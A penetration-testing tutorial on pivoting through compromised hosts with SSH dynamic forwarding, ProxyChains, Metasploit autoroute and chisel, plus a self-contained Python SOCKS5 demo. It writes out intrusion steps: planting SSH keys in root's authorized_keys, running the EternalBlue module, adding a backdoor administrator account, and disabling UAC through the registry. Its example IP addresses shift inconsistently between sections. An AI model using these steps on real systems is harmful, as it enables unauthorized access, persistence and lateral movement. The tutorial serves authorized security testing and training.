The shades of tunneling
Solution for common pivoting problems during a Penetration Test
by Karol Mazurek
During a penetration test you may encounter a scenario in which you want to pivot through one of the compromised hosts to gain access to other systems in the internal network and continue testing. In this article you will be guided through 3 pivoting scenarios and learn different tools and techniques that help you achieve this goal.
You had gained root privilege over the Linux server and conducted a host discovery in the internal network, which only the compromised host has access to. Now you want to pivot through this host. How to do it quickly?
1.1. SSH & PROXYCHAINS
- One way to achieve this goal is SSH dynamic port forwarding, which establishes a secure channel between an SSH client and an SSH server.
- The client listens on a local port; anything sent to this port is forwarded through the SSH tunnel to the SSH server, which then opens the connection to the destination named in the request.
- The local listener speaks SOCKS4 and SOCKS5, so the SSH client functions as a SOCKS proxy server.
### ON YOUR MACHINE (10.10.10.1)
# CREATE A DIRECTORY FOR MANAGING KEYS
mkdir piv_keys && chmod 700 piv_keys
# GENERATE NEW SSH KEY
ssh-keygen -f piv_keys/id_rsa_1
# COPY THE PUBLIC KEY (NOT THE PRIVATE ONE) TO CLIPBOARD
cat piv_keys/id_rsa_1.pub | clip.exe # OR JUST CAT AND COPY
### ON A COMPROMISED MACHINE (10.10.10.2)
# ADD YOUR SSH PUBLIC KEY TO authorized_keys (sshd rejects the file if it is group/world writable)
mkdir -p /root/.ssh && chmod 700 /root/.ssh
echo "ssh-rsa AAAA...[REDACTED]..." >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
### ON YOUR HOST (10.10.10.1)
# START SSH DYNAMIC PORT FORWARDING (SOCKS LISTENER ON 127.0.0.1:9999)
ssh -D 9999 -f -N root@10.10.10.2 -i piv_keys/id_rsa_1
### ON YOUR HOST (10.10.10.1)
# CONFIGURE PROXYCHAINS (/etc/proxychains4.conf)
# add proxy here ...
# defaults set to "tor"
socks5 127.0.0.1 9999
After adding the above line to the config file (and removing or commenting out the default socks4 127.0.0.1 9050 Tor entry, otherwise with the default strict_chain every connection is first tried through Tor and fails), you can start using any tool with proxychains; some examples:
- When it comes to nmap, only the TCP Connect Scan (-sT) works through ProxyChains. SYN, UDP and ICMP probes are sent over raw sockets that bypass the hooked libc calls, so also skip host discovery with -Pn; otherwise every host looks down.
- You can read more about using
- This way, you can interact with the subnet (22.214.171.124/24) from your starting host (10.10.10.1) with no need to upload tools to the jump host (10.10.10.2) and install them there.
How does ProxyChains actually work?
ProxyChains is a UNIX program that hooks the network-related libc functions (connect(), gethostbyname() and friends) of dynamically linked programs through a preloaded shared library (LD_PRELOAD) and redirects the connections through SOCKS4/5 or HTTP proxies.
1. When you create an SSH tunnel between your starting machine (10.10.10.1) and the remote server (10.10.10.2) to access the internal network (126.96.36.199/24), you additionally open a TCP socket locally on port 9999 (127.0.0.1:9999).
2. So now you need to somehow interact with this newly created socket (127.0.0.1:9999), which in fact works as a SOCKS proxy server in front of the SSH tunnel between 10.10.10.1 and 10.10.10.2, and here comes ProxyChains.
3. It connects to 127.0.0.1:9999 and wraps every connection the tool makes in a SOCKS CONNECT request naming the real destination; the SSH client (10.10.10.1) forwards it through the tunnel to the SSH server (10.10.10.2), which opens the connection to the internal host and relays the bytes back.
- ProxyChains works only on dynamically linked programs (a statically linked binary never calls the hooked libc, so its connections leave your host untouched).
- Both ProxyChains and the tool to call must use the same libc.
- Only TCP is tunneled; raw sockets, UDP and ICMP are not, so you can only use the TCP connect technique for port scanning, and ping-based host discovery does not work.
1.2. METASPLOIT & AUTOROUTE & PORTFWD
### ON YOUR HOST IN MSFCONSOLE (10.10.10.1)
# PIVOT USING ROUTE COMMAND
route add 188.8.131.52/24 2
# PIVOT USING AUTOROUTE
use post/multi/manage/autoroute
set session 2
run
# PIVOT USING AUTOROUTE IN METERPRETER SESSION
meterpreter> run autoroute -s 184.108.40.206/24
meterpreter> run autoroute -p
- Now Metasploit modules will “automagically” pivot through the compromised host to the target systems on the internal network.
- For example, you found that 220.127.116.11 is vulnerable to MS17-010 EternalBlue. To exploit this vulnerability, just run the proper module and set it up as if the target system were in your own subnet:
### ON YOUR HOST IN MSFCONSOLE (10.10.10.1)
# EXPLOIT MS17-010 EternalBlue
use exploit/windows/smb/ms17_010_psexec
set LHOST 10.10.10.1
set RHOST 18.104.22.168
run
- Keep in mind that the route only carries traffic you initiate: a reverse payload with LHOST 10.10.10.1 connects back only if the internal target can reach your host. If it cannot, set LHOST to the jump host's internal address (Metasploit then opens the handler through the session) or use a bind payload.
- Another example, if you want to conduct a TCP Connect Scan over the subnet with the portscan module:
### ON YOUR HOST IN MSFCONSOLE (10.10.10.1)
# CONDUCT TCP CONNECT SCAN
use auxiliary/scanner/portscan/tcp
set RHOSTS 22.214.171.124/24
set PORTS 1-1024
set THREADS 50
run
- If you want to connect with RDP using the Metasploit Framework as a tunnel, forward a local port to the target through the meterpreter session:
### METASPLOIT TUNNEL FROM LOCALHOST TO 126.96.36.199 FOR RDP
meterpreter> portfwd add -l 3389 -p 3389 -r 188.8.131.52
### CONNECT USING TUNNEL
xfreerdp /v:127.0.0.1:3389
You had managed to pivot through a compromised host (184.108.40.206) and gained a low privileged user CRIMSON\bofer on the Windows Server (220.127.116.11). During the investigation on the newly compromised host, you found that you can leverage a buffer overflow vulnerability in printer.exe (a service running on 127.0.0.1:4444) for privilege escalation to NT AUTHORITY\SYSTEM. You downloaded the vulnerable printer.exe to your machine and developed an exploit, and now wonder how to send it from your host (10.10.10.1) to the Windows Server, where printer.exe is running on the loopback interface only (127.0.0.1:4444).
- This time there is no way to use an SSH server on the target (Windows system 18.104.22.168), since there is no SSH preinstalled and you have no privileges to install it.
- In such a situation it is a good idea to use chisel.exe for tunneling, through the previously established SSH tunnel with ProxyChains.
### ON YOUR HOST (10.10.10.1)
# START CHISEL SERVER ON PORT 8000
proxychains chisel server -p 8000 --reverse
# START NETCAT LISTENER ON PORT 4000
nc -nlvp 4000
### ON A COMPROMISED MACHINE (22.214.171.124)
# START CHISEL CLIENT
chisel.exe client 10.10.10.1:8000 R:4000:127.0.0.1:4444
- Now, to exploit the buffer overflow in the vulnerable service, which is available only on the loopback interface of the Windows host (126.96.36.199), from your machine (10.10.10.1), you run the developed exploit against 10.10.10.1:4000 on your host.
- Caveat: the reverse remote R:4000:127.0.0.1:4444 makes the chisel server itself bind port 4000 on your host and relay everything that arrives there to 127.0.0.1:4444 on the Windows host, so port 4000 must be free when the client connects (a netcat listener left on it makes the reverse forward fail). The chisel client must also be able to reach 10.10.10.1:8000 over the network; if the Windows host only sees the first jump host, publish the server port on that jump host first and point the client at it.
You had gained NT AUTHORITY\SYSTEM on another Windows Server (188.8.131.52) through MS17-010 EternalBlue and, during post-exploitation pillaging, acquired a piece of information from the browser history of the user CRIMSON\karmaz: he was connecting to a website http://184.108.40.206:80/blog. That is why you conducted a host discovery of the adjacent network segment (220.127.116.11/24) and found one new host in this subnet: 18.104.22.168. Now, how to proxy traffic to this newly found host from your starting machine (10.10.10.1)?
3.1. OpenSSH & PROXYCHAINS
- Since you got NT AUTHORITY\SYSTEM, you can install anything you want on the compromised Windows Server.
- In such a scenario OpenSSH comes in handy; install it if it is not available.
### ON COMPROMISED HOST USING METERPRETER SESSION (22.214.171.124)
## GUIDE USING RDP:
# TURN ON RDP ON THE COMPROMISED MACHINE
run getgui -e
# ADD USER IF THERE IS NONE
run getgui -u karmazRDP -p karmaz!RDP123
# USER SHOULD BE IN THE ADMINISTRATORS GROUP, IF NOT - ADD HIM
shell
net localgroup administrators karmazRDP /add
### ON YOUR HOST (10.10.10.1)
# CONNECT OVER PROXYCHAINS & RDP USING PREVIOUS TUNNEL
proxychains xfreerdp /u:DOMAIN\\karmazRDP /p:karmaz\!RDP123 /v:10.10.10.1
### ON COMPROMISED HOST USING RDP WINDOW
# DOWNLOAD latest release of OpenSSH: LINK
# INSTALL OpenSSH instructions: LINK
# GENERATE NEW KEY PAIR
ssh-keygen
# START SSH AGENT & ADD NEW IDENTITY
Start-Service ssh-agent
ssh-add C:\Users\karmazRDP\.ssh\id_rsa
# ADD PUBLIC KEY TO authorized_keys:
# copy the content of ~\.ssh\id_rsa.pub and add it to C:\ProgramData\ssh\administrators_authorized_keys
- The tricky part is that, if the user you log in as via the SSH client is a member of the local Administrators group, his public key has to be added to C:\ProgramData\ssh\administrators_authorized_keys, not to the user's own ~\.ssh\authorized_keys.
- Another common problem is wrong permissions on that file: sshd refuses administrators_authorized_keys unless only SYSTEM and Administrators can access it. You can fix this with the PowerShell script below:
$acl = Get-Acl C:\ProgramData\ssh\administrators_authorized_keys
$acl.SetAccessRuleProtection($true, $false)
$administratorsRule = New-Object system.security.accesscontrol.filesystemaccessrule("Administrators","FullControl","Allow")
$systemRule = New-Object system.security.accesscontrol.filesystemaccessrule("SYSTEM","FullControl","Allow")
$acl.SetAccessRule($administratorsRule)
$acl.SetAccessRule($systemRule)
$acl | Set-Acl
- If you want to install OpenSSH from the command line, even as NT AUTHORITY\SYSTEM you have to switch off UAC, because it pops up a message window that you cannot handle from the command line.
## GUIDE USING COMMAND LINE (WITHOUT RDESKTOP)
# SET UAC TO 0
C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
# REBOOT THE SYSTEM
shutdown /r
# RENEW THE METERPRETER SESSION AND FOLLOW THE RDP STEPS FROM ABOVE
- Now, to set up a tunnel to the 126.96.36.199/24 subnet, you have to use on 10.10.10.2 the same private key whose corresponding public key was added to administrators_authorized_keys on the second jump host. Note that with ProxyJump (-J below) the SSH client on the starting host authenticates to both hops itself and the first jump host only relays TCP, so the copy on 10.10.10.2 is only needed if you also want to open SSH sessions from there; what the starting host needs is a key accepted by root@10.10.10.2 and the Windows key, ideally kept as separate identity files rather than overwriting ~/.ssh/id_rsa.
### ON THE SECOND JUMP HOST - 188.8.131.52
# Copy the private key, i.e. the content of ~\.ssh\id_rsa
### ON THE FIRST JUMP HOST - 10.10.10.2
# MAKE A BACKUP OF OLD ROOT PRIVATE KEY AND PUBLIC KEY
cp /root/.ssh/id_rsa /root/.ssh/id_rsa.bck
cp /root/.ssh/id_rsa.pub /root/.ssh/id_rsa.pub.bck
# MAKE NEW PRIVATE KEY FILE AND NAME IT id_rsa
# PASTE THE COPIED PRIVATE KEY FROM 184.108.40.206 IN ~/.ssh/id_rsa
# SET CORRECT PERMISSIONS
chmod 600 /root/.ssh/id_rsa
# CREATE NEW PUBLIC KEY
ssh-keygen -y -f /root/.ssh/id_rsa > /root/.ssh/id_rsa.pub
### ON THE STARTING HOST - 10.10.10.1
# MAKE A BACKUP OF OLD ROOT PRIVATE KEY AND PUBLIC KEY
cp ~/.ssh/id_rsa ~/.ssh/id_rsa.bck
cp ~/.ssh/id_rsa.pub ~/.ssh/id_rsa.pub.bck
# PASTE THE COPIED PRIVATE KEY FROM 220.127.116.11 IN ~/.ssh/id_rsa
# SET CORRECT PERMISSIONS
chmod 600 ~/.ssh/id_rsa
# CREATE NEW PUBLIC KEY
ssh-keygen -y -f ~/.ssh/id_rsa > ~/.ssh/id_rsa.pub
# CREATE A TUNNEL (JUMP THROUGH 10.10.10.2, SOCKS LISTENER ON 127.0.0.1:9999)
ssh -J root@10.10.10.2 'DOMAIN\karmazRDP@188.8.131.52' -N -f -D 9999
- The reason you have to generate a new public key file is that, if id_rsa.pub belongs to a different key than id_rsa, the SSH client will not initiate the connection with it.
- Now you can use this tunnel via ProxyChains as before in scenario 1, and packets will be tunneled from the starting machine (10.10.10.1) to any host in the 126.96.36.199/24 subnet.
3.2. CHISEL & PROXYCHAINS
- The above example with OpenSSH is more persistent and stable, but it takes more time to set up, and administrator privileges are needed if sshd is not preinstalled and enabled.
- A quick way to achieve the same goal is to set up SOCKS proxies with chisel:
### ON STARTING HOST (10.10.10.1)
# BUILD chisel (ELF) FOR FIRST JUMP HOST - 10.10.10.2
GOOS=linux GOARCH=amd64 go build -ldflags="-s -w" .
# BUILD chisel.exe FOR SECOND JUMP HOST - 18.104.22.168
GOOS=windows GOARCH=386 go build -ldflags="-s -w" .
# UPLOAD BOTH chisels TO FIRST JUMP HOST - 10.10.10.2
scp chisel root@10.10.10.2:/root/chisel
scp chisel.exe root@10.10.10.2:/root/chisel.exe
# OR DOWNLOAD THE APPROPRIATE VERSION FROM THE RELEASE PAGE
# https://github.com/jpillora/chisel/releases
# START THE CHISEL SERVER
./chisel server --socks5 --reverse -p 9001
### ON THE FIRST JUMPHOST - 10.10.10.2
# CONNECT TO THE SERVER AND START REMOTE REVERSE SOCKS ON 9998 (ON THE STARTING HOST)
./chisel client 10.10.10.1:9001 R:9998:socks &
# START THE CHISEL SERVER FOR SECOND JUMPHOST - 18.104.22.168
./chisel server --socks5 --reverse -p 9002
### ON THE SECOND JUMPHOST - 22.214.171.124
# UPLOAD chisel.exe TO THE SECOND JUMPHOST AND RUN CHISEL CLIENT (REVERSE SOCKS ON 8888 OF THE FIRST JUMPHOST)
.\chisel.exe client 126.96.36.199:9002 R:8888:socks
- At the end edit the ProxyChains configuration file. You now have two SOCKS endpoints: 127.0.0.1:9998 on the starting host, which leads into the networks of the first jump host, and port 8888 on the first jump host (10.10.10.2), which leads into the networks of the second jump host; add one socks5 line per endpoint, and with strict_chain the connection is passed through them in the listed order.
- Now you can access the subnet 188.8.131.52/24 and the subnet 184.108.40.206/24 from your starting host (10.10.10.1).
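As an added illustration that is not code from this article, from ProxyChains or from chisel, the following Python script performs the SOCKS5 CONNECT exchange that ProxyChains' hooked connect() issues against the listener opened by ssh -D (section 1.1, "How does ProxyChains actually work?") and, as the general case, the strict_chain variant from section 3.2: the CONNECT for the second proxy is sent through the first, and the target's CONNECT through the second. Both SOCKS hops, their ports and the echo target are constructed in-process (a minimal no-auth server stands in for the ssh -D / chisel listener), so the script runs offline without any jump host.

```python
import socket
import struct
import threading

# SOCKS5 (RFC 1928) constants; ssh -D and chisel's socks listener both offer the "no auth" method.
SOCKS_VER, CMD_CONNECT, ATYP_IPV4, ATYP_DOMAIN, ATYP_IPV6, REP_OK = 5, 1, 1, 3, 4, 0


def recv_exact(sock, n):
    buf = b""
    while len(buf) < n:  # handshake fields must never be read short
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("socket closed mid-handshake")
        buf += chunk
    return buf


def socks5_connect(sock, host, port):
    """Client side of the handshake on an already-connected socket: this is what the
    connect() hook of ProxyChains performs against the listener on 127.0.0.1:9999."""
    sock.sendall(bytes([SOCKS_VER, 1, 0]))  # greeting: one method offered, "no auth"
    ver, method = recv_exact(sock, 2)
    if ver != SOCKS_VER or method != 0:
        raise ConnectionError(f"proxy rejected no-auth, method={method:#x}")
    try:  # IPv4 literal, or a domain name the proxy resolves itself (proxy_dns)
        dst = bytes([ATYP_IPV4]) + socket.inet_aton(host)
    except OSError:
        dst = bytes([ATYP_DOMAIN, len(host)]) + host.encode()
    sock.sendall(bytes([SOCKS_VER, CMD_CONNECT, 0]) + dst + struct.pack("!H", port))
    ver, rep, _rsv, atyp = recv_exact(sock, 4)
    if rep != REP_OK:
        raise ConnectionError(f"CONNECT to {host}:{port} failed, REP={rep:#x}")
    n = 4 if atyp == ATYP_IPV4 else 16 if atyp == ATYP_IPV6 else recv_exact(sock, 1)[0]
    recv_exact(sock, n + 2)  # skip BND.ADDR and BND.PORT; sock is now a pipe to host:port
    return sock


def connect_through_chain(proxies, host, port):
    """strict_chain: TCP to the first proxy, CONNECT to each further proxy through the
    previous one, then CONNECT to the real target through the last proxy."""
    sock = socket.create_connection(proxies[0])
    for nxt in proxies[1:]:
        socks5_connect(sock, *nxt)
    return socks5_connect(sock, host, port)


# Constructed stand-ins so the exchange runs offline: a minimal no-auth SOCKS5 server in
# place of the ssh -D / chisel listener (not their code) and an echo service as the target.
def _pipe(src, dst):  # copy src -> dst until EOF, then half-close dst so the peer sees EOF
    try:
        while data := src.recv(4096):
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def _handle_socks5(client):
    with client:
        _ver, nmethods = recv_exact(client, 2)
        recv_exact(client, nmethods)
        client.sendall(bytes([SOCKS_VER, 0]))  # select "no auth"
        _ver, _cmd, _rsv, atyp = recv_exact(client, 4)
        if atyp == ATYP_IPV4:
            host = socket.inet_ntoa(recv_exact(client, 4))
        else:
            host = recv_exact(client, recv_exact(client, 1)[0]).decode()
        port = struct.unpack("!H", recv_exact(client, 2))[0]
        try:
            upstream = socket.create_connection((host, port))
        except OSError:
            client.sendall(bytes([SOCKS_VER, 5, 0, ATYP_IPV4]) + bytes(6))  # REP 5: refused
            return
        client.sendall(bytes([SOCKS_VER, REP_OK, 0, ATYP_IPV4]) + bytes(6))
        with upstream:
            back = threading.Thread(target=_pipe, args=(upstream, client), daemon=True)
            back.start()
            _pipe(client, upstream)
            back.join()


def _echo(conn):
    with conn:
        while data := conn.recv(4096):
            conn.sendall(data)


def _serve(listener, handler):
    while True:
        threading.Thread(target=handler, args=(listener.accept()[0],), daemon=True).start()


def demo_chain(payload=b"ping"):
    """Two SOCKS hops (playing 127.0.0.1:9998 and then 10.10.10.2:8888 from section 3.2)
    in front of an echo target; returns what came back through both hops."""
    target, hop1, hop2 = (socket.create_server(("127.0.0.1", 0)) for _ in range(3))
    for lst, handler in ((target, _echo), (hop1, _handle_socks5), (hop2, _handle_socks5)):
        threading.Thread(target=_serve, args=(lst, handler), daemon=True).start()
    chain = [hop1.getsockname(), hop2.getsockname()]
    with connect_through_chain(chain, *target.getsockname()) as sock:
        sock.sendall(payload)
        return recv_exact(sock, len(payload))
```

demo_chain() returns the bytes echoed back through both hops; replacing the constructed proxies list with [("127.0.0.1", 9998), ("10.10.10.2", 8888)] is the manual equivalent of the proxychains configuration above. Note the point from the ProxyChains caveats: every hop carries only TCP streams, so there is no way to express a ping or a UDP datagram in this exchange, and a hop that cannot reach the target answers with REP 0x05 instead of relaying.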
3.3. METASPLOIT & AUTOROUTE
- You can use Metasploit if you managed to establish a meterpreter session with the second jump host.
- You have the option to use this session for the second pivot to gain access to systems in the newly discovered subnet:
### ON YOUR HOST IN MSFCONSOLE (10.10.10.1)
# PIVOT USING ROUTE COMMAND
route add 220.127.116.11/24 3
# PIVOT USING AUTOROUTE
use post/multi/manage/autoroute
set session 3
run
# PIVOT USING AUTOROUTE IN METERPRETER SESSION
meterpreter> run autoroute -s 18.104.22.168/24
meterpreter> run autoroute -p
- The Metasploit modules will “automagically” pivot through the first jump host (22.214.171.124) and then through the second one (126.96.36.199) to access the internal network.